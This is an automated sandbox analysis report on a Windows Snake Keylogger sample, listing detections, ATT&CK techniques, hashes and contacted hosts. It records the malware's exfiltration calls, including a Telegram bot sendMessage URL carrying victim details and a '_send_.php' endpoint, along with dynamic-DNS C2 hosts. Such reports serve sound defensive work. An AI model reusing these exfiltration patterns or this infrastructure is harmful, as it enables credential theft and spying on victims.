DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
n0nsAzvYNd.exe	68%	Virustotal		Browse
n0nsAzvYNd.exe	76%	ReversingLabs	Win32.Spyware.Snakekeylogger
n0nsAzvYNd.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://certs.starfieldtech.com/repository/1402	0%	Avira URL Cloud	safe
http://mail.starofseasmarine.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
mail.starofseasmarine.com	166.62.28.135	true	true	unknown
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2012/01/2025%20/%2014:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000002.00000002.4513561000.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlBcq	RegSvcs.exe, 00000002.00000002.4513561000.00000000032A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false		high
https://certs.starfieldtech.com/repository/0	RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certificates.starfieldtech.com/repository/0	RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20a	RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certificates.starfieldtech.com/repository/s	RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://certs.starfieldtech.com/repository/1402	RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.starfieldtech.com/sfroot-g2.crl0L	RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/08	RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/0;	RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enDze	RegSvcs.exe, 00000002.00000002.4513561000.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000002.00000002.4513561000.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/Dze	RegSvcs.exe, 00000002.00000002.4513561000.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/0F	RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.starfieldtech.com/sfig2s1-677.crl0c	RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000002.00000002.4513561000.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.00000000031AC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.4513561000.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003183000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.starfieldtech.com/sfroot.crl0L	RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.starofseasmarine.com	RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificates.starfieldtech.com/repository/sfig2.crt0	RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lBcq	RegSvcs.exe, 00000002.00000002.4513561000.00000000032D9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000002.00000002.4513561000.0000000003183000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
166.62.28.135	mail.starofseasmarine.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588599
Start date and time:	2025-01-11 02:59:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	n0nsAzvYNd.exe renamed because original name is a hash value
Original Sample Name:	d4e2fbfc32056e62acf75175d7612639a9987bea0b543c1805235c9582d4991a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 50 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:59:57	API Interceptor	11467636x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
166.62.28.135	ekeson and sons.exe	Get hash	malicious	FormBook	Browse	www.astrobalajichennai.com/eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ==
193.122.130.0	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
reallyfreegeoip.org	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
api.telegram.org	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
ORACLE-BMC-31898US	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
AS-26496-GO-DADDY-COM-LLCUS	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.28.135
	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	https://jmak-service.com/3225640388	Get hash	malicious	HTMLPhisher	Browse	107.180.119.1
	https://www.google.com/url?q=YG2GERTSbxgfeaGh1Yi5pby8yODY0MDkxOTEyNjI3MjNkMzQzMGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjI5MjAwOTkviinbsewtyuas53D1e4a0cefd8db4ad28e54c10117f7d498%2526i%253DNjI2YjE3MTBiZWI4YTgxMWUwNDIxNzE3%2526p%253Dm%2526s%253DAVNPUEhUT0NFTkNSWVBUSVYmhcLGCIsQzpMqHgYCBBo2kwEPWKEfFaahaLsnpofO4A%2526t%253DM3dHV0ZCT2t4azAvRVhKQ3B1ZC95RFFTdmpSMCt3cEFxWHJocUMzM0EyZz0%25253D%2526u%253DaHR0cHM6Ly9tLmV4YWN0YWcuY29tL2NsLmFzcHg_ZXh0UHJvdkFwaT1zaXh0L&sa=t&url=amp%2Fdlocumndjkacheckckoqingnmlcsoftlineon-secure-portal.us-iad-10.linodeobjects.com/newdocusign.html#Tdcjoiletuzn43fqnlhtwn8dbfakjhsdbfjhasbdfkjasbdkf%20ashjdbaksdbfkjasbdbfad	Get hash	malicious	Unknown	Browse	208.109.228.27
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	fuckunix.arm.elf	Get hash	malicious	Mirai	Browse	50.62.7.191
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	72.167.237.175

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ukBQ4ch2nE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\n0nsAzvYNd.exe
File Type:	data
Category:	dropped
Size (bytes):	248320
Entropy (8bit):	7.878101844350145
Encrypted:	false
SSDEEP:	3072:UcVMoGE7RLNyD10BSH8dfluVtWUfDboEmD42bq26sbuGxRYzuEUOFxsUb71FsH/J:xVMoGEVLC10Bo8dflrEZ2+QFOoU3oac9
MD5:	A4D1A57F8509EB4FD19F8EBC1D9FC91B
SHA1:	BA2542A09441D2D39425DEE32C05B6B75175793B
SHA-256:	F01C3C8292B79D1CDC9D5C21A7478B83A02EAB1D488B9C663129159A61F9529F
SHA-512:	CF6C51D2144777401CD54010E0D1E55D40DF2385BFF06FCD1EF2904160D4EBF8A440BDDE0240F5F8CDE43C95765977A9D9EB642A40E6647A10AE894B5F9F9C0D
Malicious:	false
Reputation:	low
